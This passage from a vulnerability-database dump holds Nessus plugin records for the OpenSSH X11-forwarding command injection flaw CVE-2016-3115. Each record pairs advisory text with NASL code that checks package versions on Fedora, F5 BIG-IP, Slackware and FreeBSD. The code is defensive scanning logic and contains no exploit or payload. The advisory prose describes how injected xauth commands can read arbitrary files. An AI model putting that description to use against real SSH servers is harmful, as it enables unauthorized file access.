(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"gsi-openssh-6.9p1-8.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:13:58", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-05-09T00:00:00", "title": "Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-08E5803496.NASL", "href": "https://www.tenable.com/plugins/nessus/90947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-08e5803496.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90947);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-08e5803496\");\n\n script_name(english:\"Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?57a55728\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"gsi-openssh-7.2p2-2.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gsi-openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-02-01T02:05:37", "description": "Multiple CRLF injection vulnerabilities in session.c in sshd in\nOpenSSH before 7.2p2 allow remote authenticated users to bypass\nintended shell-command restrictions via crafted X11 forwarding data,\nrelated to the (1) do_authenticated1 and (2) session_x11_req\nfunctions. (CVE-2016-3115)", "edition": 27, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2017-07-21T00:00:00", "title": "F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL93532943.NASL", "href": "https://www.tenable.com/plugins/nessus/101859", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K93532943.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101859);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2016-3115\");\n\n script_name(english:\"F5 Networks BIG-IP : SSHD session.c vulnerability (K93532943)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple CRLF injection vulnerabilities in session.c in sshd in\nOpenSSH before 7.2p2 allow remote authenticated users to bypass\nintended shell-command restrictions via crafted X11 forwarding data,\nrelated to the (1) do_authenticated1 and (2) session_x11_req\nfunctions. (CVE-2016-3115)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K93532943\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K93532943.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K93532943\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\",\"11.2.1\",\"10.2.1-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"14.0.0\",\"13.0.0\",\"12.1.3\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-17T09:10:51", "description": "New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.", "edition": 24, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-11T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-11T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "p-cpe:/a:slackware:slackware_linux:openssh", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-070-01.NASL", "href": "https://www.tenable.com/plugins/nessus/89836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-070-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89836);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"SSA\", value:\"2016-070-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New openssh packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.517960\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3eab48b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"openssh\", pkgver:\"7.2p2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-06T10:59:18", "description": "The OpenSSH project reports :\n\nMissing sanitisation of untrusted input allows an authenticated user\nwho is able to request X11 forwarding to inject commands to xauth(1).\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege, Other xauth commands allow\nlimited information leakage, file overwrite, port probing and\ngenerally expose xauth(1), which was not written with a hostile user\nin mind, as an attack surface.\n\nMitigation :\n\nSet X11Forwarding=no in sshd_config. This is the default.\n\nFor authorized_keys that specify a 'command' restriction, also set the\n'restrict' (available in OpenSSH >=7.2) or 'no-x11-forwarding'\nrestrictions.", "edition": 26, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-14T00:00:00", "title": "FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:openssh-portable"], "id": "FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL", "href": "https://www.tenable.com/plugins/nessus/89897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89897);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:14.openssh\");\n\n script_name(english:\"FreeBSD : openssh -- command injection when X11Forwarding is enabled (e4644df8-e7da-11e5-829d-c80aa9043978)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The OpenSSH project reports :\n\nMissing sanitisation of untrusted input allows an authenticated user\nwho is able to request X11 forwarding to inject commands to xauth(1).\n\nInjection of xauth commands grants the ability to read arbitrary files\nunder the authenticated user's privilege, Other xauth commands allow\nlimited information leakage, file overwrite, port probing and\ngenerally expose xauth(1), which was not written with a hostile user\nin mind, as an attack surface.\n\nMitigation :\n\nSet X11Forwarding=no in sshd_config. This is the default.\n\nFor authorized_keys that specify a 'command' restriction, also set the\n'restrict' (available in OpenSSH >=7.2) or 'no-x11-forwarding'\nrestrictions.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.openssh.com/txt/x11fwd.adv\"\n );\n # https://vuxml.freebsd.org/freebsd/e4644df8-e7da-11e5-829d-c80aa9043978.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a7b4781\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssh-portable\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"openssh-portable<7.2.p2,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-02-01T01:21:14", "description": "It was discovered that the OpenSSH server did not sanitize data\nreceived in requests to enable X11 forwarding. An authenticated client\nwith restricted SSH access could possibly use this flaw to bypass\nintended restrictions.", "edition": 25, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-17T00:00:00", "title": "Amazon Linux AMI : openssh (ALAS-2016-668)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:openssh-clients", "p-cpe:/a:amazon:linux:pam_ssh_agent_auth", 